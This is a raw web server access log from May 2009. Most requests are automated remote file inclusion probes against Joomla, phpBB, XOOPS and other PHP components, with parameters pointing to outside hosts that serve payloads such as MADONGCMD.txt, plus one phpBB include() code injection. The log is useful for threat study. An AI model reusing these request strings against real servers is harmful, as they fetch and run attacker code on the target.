193.221.119.126 - - [16/May/2009:01:14:03 -0400] "GET /logs/error_log.Q109042900//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
200.32.100.130 - - [16/May/2009:01:14:03 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/idosiriys.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
189.156.3.135 - - [16/May/2009:01:14:21 -0400] "GET //components/errors.php?error=http://tugaspeed.info/idpriv8.txt%0D?? HTTP/1.1" 404 220 "-" "libwww-perl/5.803"
189.156.3.135 - - [16/May/2009:01:14:23 -0400] "GET /logs/access_log.Q109022600//components/errors.php?error=http://tugaspeed.info/idpriv8.txt%0D?? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
189.156.3.135 - - [16/May/2009:01:14:23 -0400] "GET /logs//components/errors.php?error=http://tugaspeed.info/idpriv8.txt%0D?? HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
200.32.100.130 - - [16/May/2009:01:14:26 -0400] "GET /logs/access_log.Q108100600/components/com_performs/performs.php?mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/idosiriys.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
72.52.255.82 - - [16/May/2009:01:14:34 -0400] "GET /logs/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 243 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
72.52.255.82 - - [16/May/2009:01:14:34 -0400] "GET /plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 238 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
189.156.3.135 - - [16/May/2009:01:14:44 -0400] "GET /logs/access_log.Q108083000//components/errors.php?error=http://tugaspeed.info/idpriv8.txt%0D?? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
222.122.26.5 - - [16/May/2009:01:14:56 -0400] "GET /logs/access_log.Q108091400%20%20///vwar/backup/errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
72.30.79.49 - - [16/May/2009:01:15:03 -0400] "GET /logs/access_log.Q108052200 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.52.255.82 - - [16/May/2009:01:15:18 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 239 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
72.52.255.82 - - [16/May/2009:01:15:18 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 234 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
210.118.194.200 - - [16/May/2009:01:15:25 -0400] "GET /logs/access_log.Q108120600//?_zb_path=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
72.30.79.49 - - [16/May/2009:01:15:48 -0400] "GET /logs/error_log.Q109051600 HTTP/1.0" 200 229524 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.79.49 - - [16/May/2009:01:15:48 -0400] "GET /logs/error_log.Q109051600 HTTP/1.0" 200 229524 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [16/May/2009:01:15:56 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
190.144.44.36 - - [16/May/2009:01:16:03 -0400] "GET /plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 238 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
190.144.44.36 - - [16/May/2009:01:16:03 -0400] "GET /logs/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 243 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
87.106.135.14 - - [16/May/2009:01:16:06 -0400] "GET /logs/access_log.Q109013000//components/com_simpleboard/image_upload.php?sbp=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
87.106.135.14 - - [16/May/2009:01:16:06 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
87.106.135.14 - - [16/May/2009:01:16:07 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
88.84.128.40 - - [16/May/2009:01:16:20 -0400] "GET /logs/access_log.Q109013000//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.803"
88.84.128.40 - - [16/May/2009:01:16:20 -0400] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:01:16:20 -0400] "GET /logs/access_log.Q108100600//components/com_sef/sef_incl.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:01:16:21 -0400] "GET //components/com_sef/sef_incl.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.803"
88.84.128.40 - - [16/May/2009:01:16:21 -0400] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:01:16:21 -0400] "GET /logs//components/com_sef/sef_incl.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
193.25.197.14 - - [16/May/2009:01:16:30 -0400] "GET /logs/access_log.Q109032800%20%20//viewbody.html?code=http://www.shababek.de/baner.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
87.106.135.14 - - [16/May/2009:01:16:33 -0400] "GET /logs/access_log.Q108100600//components/com_sef/sef.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
87.106.135.14 - - [16/May/2009:01:16:33 -0400] "GET //components/com_sef/sef.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
87.106.135.14 - - [16/May/2009:01:16:33 -0400] "GET /logs//components/com_sef/sef.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
217.18.76.16 - - [16/May/2009:01:16:36 -0400] "GET /logs/access_log.Q109013000//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
217.18.76.16 - - [16/May/2009:01:16:36 -0400] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
217.18.76.16 - - [16/May/2009:01:16:36 -0400] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
217.18.76.16 - - [16/May/2009:01:17:23 -0400] "GET /logs/error_log.Q109012000//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 268 "-" "libwww-perl/5.805"
72.52.255.82 - - [16/May/2009:01:17:39 -0400] "GET /logs/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
72.52.255.82 - - [16/May/2009:01:17:39 -0400] "GET /viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 211 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
72.52.255.82 - - [16/May/2009:01:17:40 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.52.255.82 - - [16/May/2009:01:17:40 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 239 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.52.255.82 - - [16/May/2009:01:17:57 -0400] "GET //components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 273 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
72.52.255.82 - - [16/May/2009:01:17:57 -0400] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 278 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
69.172.92.14 - - [16/May/2009:01:18:10 -0400] "GET /logs/access_log.Q108100600//components/com_sef/sef_func.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:01:18:12 -0400] "GET //components/com_sef/sef_func.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:01:18:12 -0400] "GET /logs//components/com_sef/sef_func.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
163.20.116.193 - - [16/May/2009:01:18:34 -0400] "GET //errors.php?error=http://quetzal1.innsz.mx//components/com_joomlalib/standalone/fx29id.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
163.20.116.193 - - [16/May/2009:01:18:34 -0400] "GET /logs//errors.php?error=http://quetzal1.innsz.mx//components/com_joomlalib/standalone/fx29id.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
163.20.116.193 - - [16/May/2009:01:18:34 -0400] "GET /logs/error_log.Q108081200%20%20//errors.php?error=http://quetzal1.innsz.mx//components/com_joomlalib/standalone/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
163.20.116.193 - - [16/May/2009:01:18:37 -0400] "GET /logs/error_log.Q108051600%20%20//errors.php?error=http://quetzal1.innsz.mx//components/com_joomlalib/standalone/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
88.84.128.40 - - [16/May/2009:01:18:40 -0400] "GET /logs/access_log.Q108100600//components/com_sef/sef_incl.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.803"
88.84.128.40 - - [16/May/2009:01:18:40 -0400] "GET //components/com_sef/sef_incl.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.803"
88.84.128.40 - - [16/May/2009:01:18:41 -0400] "GET /logs//components/com_sef/sef_incl.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
87.106.135.14 - - [16/May/2009:01:18:49 -0400] "GET /logs/error_log.Q109012000//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 268 "-" "libwww-perl/5.805"
72.52.255.82 - - [16/May/2009:01:19:04 -0400] "GET /logs/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 243 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
72.52.255.82 - - [16/May/2009:01:19:04 -0400] "GET /plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 238 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
193.25.197.12 - - [16/May/2009:01:19:21 -0400] "GET /logs/error_log.Q108121900//viewbody.html?code=http://www.arylia.com/banners/93/yes.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
193.25.197.12 - - [16/May/2009:01:19:21 -0400] "GET /logs//viewbody.html?code=http://www.arylia.com/banners/93/yes.txt??? HTTP/1.1" 404 217 "-" "libwww-perl/5.805"
193.25.197.12 - - [16/May/2009:01:19:22 -0400] "GET //viewbody.html?code=http://www.arylia.com/banners/93/yes.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
72.52.255.82 - - [16/May/2009:01:19:27 -0400] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 242 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.52.255.82 - - [16/May/2009:01:19:27 -0400] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 247 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.52.255.82 - - [16/May/2009:01:19:29 -0400] "GET /logs/errors.php?error=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.52.255.82 - - [16/May/2009:01:19:29 -0400] "GET /errors.php?error=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
207.182.147.210 - - [16/May/2009:01:19:41 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.jspipesanddrums.com/photos/footer.gif?? HTTP/1.1" 404 253 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
207.182.147.210 - - [16/May/2009:01:19:41 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.jspipesanddrums.com/photos/footer.gif?? HTTP/1.1" 404 258 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
69.172.92.14 - - [16/May/2009:01:19:49 -0400] "GET /logs/error_log.Q109012000//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 268 "-" "libwww-perl/5.803"
196.25.27.90 - - [16/May/2009:01:20:05 -0400] "GET /logs//viewbody.html?code=http://www.photolive.cz//components/com_joomlalib/standalone/id.txt?? HTTP/1.1" 404 217 "-" "libwww-perl/5.79"
196.25.27.90 - - [16/May/2009:01:20:05 -0400] "GET //viewbody.html?code=http://www.photolive.cz//components/com_joomlalib/standalone/id.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
196.25.27.90 - - [16/May/2009:01:20:05 -0400] "GET /logs/access_log.Q108121900//viewbody.html?code=http://www.photolive.cz//components/com_joomlalib/standalone/id.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.79"
69.172.92.14 - - [16/May/2009:01:20:10 -0400] "GET /logs/access_log.Q109013000//components/com_simpleboard/image_upload.php?sbp=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:01:20:10 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:01:20:10 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
58.227.193.198 - - [16/May/2009:01:20:19 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:01:20:19 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:01:20:19 -0400] "GET /logs/error_log.Q109042900//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
87.106.135.14 - - [16/May/2009:01:20:47 -0400] "GET /logs/access_log.Q108100600//components/com_sef/sef.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
87.106.135.14 - - [16/May/2009:01:20:47 -0400] "GET //components/com_sef/sef.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
87.106.135.14 - - [16/May/2009:01:20:47 -0400] "GET /logs//components/com_sef/sef.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
72.52.255.82 - - [16/May/2009:01:20:48 -0400] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 247 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
72.52.255.82 - - [16/May/2009:01:20:49 -0400] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 242 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
72.52.255.82 - - [16/May/2009:01:20:49 -0400] "GET /errors.php?error=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
72.52.255.82 - - [16/May/2009:01:20:49 -0400] "GET /logs/errors.php?error=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
209.59.12.99 - - [16/May/2009:01:20:55 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.52.255.82 - - [16/May/2009:01:21:11 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
72.52.255.82 - - [16/May/2009:01:21:11 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 239 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
196.25.27.90 - - [16/May/2009:01:21:14 -0400] "GET /logs/error_log.Q108121900//viewbody.html?code=http://www.photolive.cz//components/com_joomlalib/standalone/id.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
72.52.255.82 - - [16/May/2009:01:21:25 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 239 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
72.52.255.82 - - [16/May/2009:01:21:25 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 234 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
88.84.128.40 - - [16/May/2009:01:21:46 -0400] "GET /logs/error_log.Q109012000//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 268 "-" "libwww-perl/5.803"
72.30.79.49 - - [16/May/2009:01:21:54 -0400] "GET /logs/error_log.Q109051200 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
88.84.128.40 - - [16/May/2009:01:21:57 -0400] "GET /logs/access_log.Q109013000//components/com_simpleboard/image_upload.php?sbp=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.803"
88.84.128.40 - - [16/May/2009:01:21:58 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
88.84.128.40 - - [16/May/2009:01:21:58 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
72.30.79.49 - - [16/May/2009:01:22:01 -0400] "GET /logs/access_log.Q108031300 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
193.25.197.12 - - [16/May/2009:01:22:28 -0400] "GET /logs/access_log.Q109032800//viewbody.html?code=http://www.arylia.com/banners/93/yes.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
69.172.92.14 - - [16/May/2009:01:22:38 -0400] "GET /logs/access_log.Q108100600//components/com_sef/sef.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:01:22:39 -0400] "GET //components/com_sef/sef.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
69.172.92.14 - - [16/May/2009:01:22:39 -0400] "GET /logs//components/com_sef/sef.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.803"
65.30.100.203 - - [16/May/2009:01:22:42 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
65.30.100.203 - - [16/May/2009:01:22:42 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
69.94.30.156 - - [16/May/2009:01:22:43 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
69.94.30.156 - - [16/May/2009:01:22:43 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
65.30.100.203 - - [16/May/2009:01:22:44 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
65.30.100.203 - - [16/May/2009:01:22:44 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
72.52.255.82 - - [16/May/2009:01:23:02 -0400] "GET /logs/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 243 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.52.255.82 - - [16/May/2009:01:23:02 -0400] "GET /plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 238 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
203.22.204.193 - - [16/May/2009:01:23:05 -0400] "GET /logs/access_log.Q108080100//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 272 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
203.22.204.193 - - [16/May/2009:01:23:05 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 245 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
72.52.255.82 - - [16/May/2009:01:23:10 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 249 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
72.52.255.82 - - [16/May/2009:01:23:10 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 254 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
72.52.255.82 - - [16/May/2009:01:23:31 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 254 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
72.52.255.82 - - [16/May/2009:01:23:31 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
222.122.26.5 - - [16/May/2009:01:23:46 -0400] "GET /logs/access_log.Q108091400///vwar/backup/errors.php?error=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
72.52.255.82 - - [16/May/2009:01:23:52 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
